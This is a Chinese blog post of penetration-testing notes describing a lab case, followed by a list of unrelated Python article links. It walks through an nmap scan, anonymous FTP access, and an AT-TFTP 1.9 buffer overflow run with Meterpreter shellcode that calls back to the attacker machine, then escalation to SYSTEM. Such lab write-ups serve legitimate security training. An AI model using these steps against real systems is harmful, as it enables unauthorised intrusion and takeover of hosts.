博客
关于我
渗透测试学习笔记之案例五
阅读量:146 次
发布时间:2019-02-28

本文共 781 字,大约阅读时间需要 2 分钟。

0x00 前言

今天这篇文章将分享一个渗透测试中的实际案例,展示从信息收集到最终获得目标主机控制的完整过程。

0x01 案例分析

实验环境

  • 目标靶机:10.11.1.0/24
  • 攻击机:Kali Linux(10.11.0.74)

渗透过程

开始进行服务和端口扫描:

# nmap -sT -Pn 10.11.1.226

扫描结果显示目标主机开放了ftp和RDP服务。初步测试发现,ftp服务支持匿名登录。

通过ftp服务,我们发现并下载了一个名为servers.py的Python脚本。进一步分析发现,该脚本用于启动ftp和tftp服务,具体涉及以下操作:

# cat servers.pyimport wmi, time, ftplib, tftpy

发现tftp漏洞

通过Google搜索,我们发现AT-TFTP 1.9存在一个缓冲区溢出漏洞(RCE)。利用Meterpreter反弹shell的生成工具,替换脚本中的shellcode代码,并运行:

# python atftp.py 10.11.1.226 69 10.11.0.74 9

最终,我们成功获得了一个Meterpreter反弹shell。

通过msf的反弹shell处理程序,迁移并提权至SYSTEM权限,完成渗透目标。

0x02 小结

该案例的渗透思路总结如下:

  • 服务和端口扫描:首先发现目标主机开放了ftp服务,并进一步确认tftp服务的存在。
  • 脚本分析:通过ftp下载并分析servers.py脚本,发现其用于启动ftp和tftp服务。
  • 漏洞利用:利用AT-TFTP 1.9的缓冲区溢出漏洞,生成Meterpreter反弹shell。
  • 反弹shell提权:通过msf反弹shell迁移进程并提权至SYSTEM权限。
  • 该案例展示了如何通过合理利用现有信息和漏洞,逐步实现渗透测试的目标。

    转载地址:http://cfgc.baihongyu.com/

    你可能感兴趣的文章
    python 实现儿童算术游戏
    查看>>
    python 实现字符串转整型
    查看>>
    Python 实现定时任务的八种方案!
    查看>>
    python 实现将RGBA 转换为RGB
    查看>>
    python字符串与url编码的转换
    查看>>
    Python 实现自动化测试 dubbo 协议接口
    查看>>
    python编程基础之十六
    查看>>
    python字符串input输入_Python input()函数:获取用户输入的字符串
    查看>>
    python 对json数据读取及保存与读取,对dump,dumps,load,loads的理解
    查看>>
    Python 对mysql数据库的操作
    查看>>
    Python 对象数据库列表
    查看>>
    Python 导入requests报错No module named requests
    查看>>
    Python 将JPEG图片批量改成jpg并删除JPEG图片
    查看>>
    python 将函数加到列表中进行调用
    查看>>
    python 将图片与字符串相互转换
    查看>>
    Python 嵌套字典全面指南
    查看>>
    Python 工具v简介
    查看>>
    Python编程入门指南:从零开始探索编程的奇妙世界
    查看>>
    python 常见内置函数setattr、getattr、delattr、setitem、getitem、delitem
    查看>>
    Python 常见的错误类型和继承关系
    查看>>